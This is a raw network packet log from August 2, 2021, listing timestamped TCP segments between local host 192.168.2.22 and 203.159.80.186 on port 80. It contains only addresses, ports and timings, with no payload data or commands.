                                Aug 2, 2021 10:59:54.401011944 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401035070 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401043892 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401065111 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401077032 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401094913 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401101112 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401125908 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401134968 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401160002 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401164055 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401190042 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401196003 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401221037 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401231050 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401252031 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401261091 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401283026 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401293039 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401313066 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401323080 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401344061 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401352882 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401374102 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401384115 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401407957 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401412964 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401439905 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401446104 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401469946 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401470900 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401499987 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401510000 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401531935 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401539087 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401562929 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401571989 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401593924 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401604891 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401623964 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401633024 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401658058 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401660919 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401689053 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401698112 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401717901 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401727915 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401748896 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401757956 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401778936 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401787996 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401808023 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401819944 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401838064 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401844978 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401879072 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.402111053 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.428117990 CEST8049165203.159.80.186192.168.2.22
Aug 2, 2021 10:59:54.428164005 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428188086 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428210020 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428231001 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428251982 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428266048 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.428272963 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428289890 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.428292990 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.428296089 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428297043 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.428318024 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428325891 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.428343058 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428345919 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.428365946 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428374052 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.428395033 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.428482056 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428507090 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428517103 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.428539038 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.428766966 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.428808928 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.429610968 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.429893017 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.429914951 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.429936886 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.429938078 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.429953098 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.429961920 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.429966927 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.429985046 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.429991961 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430006981 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430013895 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430028915 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430037022 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430052996 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430053949 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430078030 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430084944 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430099964 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430107117 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430123091 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430130005 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430144072 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430151939 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430166006 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430172920 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430188894 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430197001 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430211067 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430219889 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430234909 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430243015 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430257082 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430264950 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430278063 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430279016 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430300951 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430309057 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430321932 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430330038 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430344105 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430352926 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430365086 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430381060 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430385113 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430387974 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430409908 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430418015 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430439949 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430582047 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430617094 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430640936 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430658102 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430663109 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430685043 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430686951 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430691957 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430707932 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430722952 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430728912 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430749893 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430749893 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430775881 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430782080 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430790901 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430805922 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430810928 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430830002 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430834055 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430852890 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430861950 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430876017 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430885077 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430897951 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430905104 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430918932 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430926085 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430941105 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430949926 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430963039 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.430963993 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430986881 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.430994034 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431010962 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431018114 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431034088 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431041002 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431055069 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431065083 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431077003 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431085110 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431099892 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431099892 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431149006 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431155920 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431175947 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431184053 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431199074 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431206942 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431221962 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431230068 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431243896 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431252003 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431266069 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431267023 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431287050 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431293964 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431312084 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431315899 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431334019 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431348085 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431355000 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431361914 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431376934 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431386948 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431397915 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431401968 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431418896 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431427956 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431441069 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431448936 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431462049 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431477070 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431483984 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431489944 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431507111 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431514978 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431528091 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431536913 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431550026 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431557894 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431571960 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431577921 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431592941 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431601048 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431615114 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431622982 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431636095 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431643963 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431658983 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431663990 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431682110 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431695938 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431701899 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431709051 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431723118 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431730986 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431745052 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431751966 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431765079 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431773901 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431786060 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431787968 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431807041 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431814909 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431826115 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431829929 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431853056 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431860924 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431873083 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431880951 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431895018 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431902885 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431915998 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.431925058 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.431946039 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.434425116 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.456861019 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.456896067 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.456926107 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.456949949 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.456954002 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.456969976 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.456983089 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.456990957 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457010984 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457015038 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457039118 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457046032 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457066059 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457073927 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457096100 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457099915 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457123995 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457132101 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457150936 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457159042 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457184076 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457185984 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457216024 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457232952 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457242012 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457247019 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457268953 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457277060 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457295895 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457304001 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457326889 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457330942 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457355022 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457359076 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457381010 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457389116 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457411051 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457415104 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457441092 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457444906 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457467079 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457474947 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457498074 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457501888 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457525015 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457531929 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457555056 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457560062 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457583904 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457588911 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457611084 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457618952 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457638979 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.457643986 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457672119 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.457914114 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.458767891 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.458801031 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.458822012 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.458830118 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.458857059 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.458863974 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.458877087 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.458887100 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.458895922 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.458914995 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.458920002 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.458940983 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.458945990 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.458969116 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.458973885 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.458996058 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.459001064 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.459026098 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.459027052 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.459074020 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.459074020 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.459108114 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.459109068 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.459153891 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.459218979 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.459253073 CEST  49165  80  192.168.2.22  203.159.80.186
Aug 2, 2021 10:59:54.461374044 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.461393118 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.461405993 CEST  80  49165  203.159.80.186  192.168.2.22
Aug 2, 2021 10:59:54.461433887 CEST  80  49165  203.159.80.186  192.168.2.22
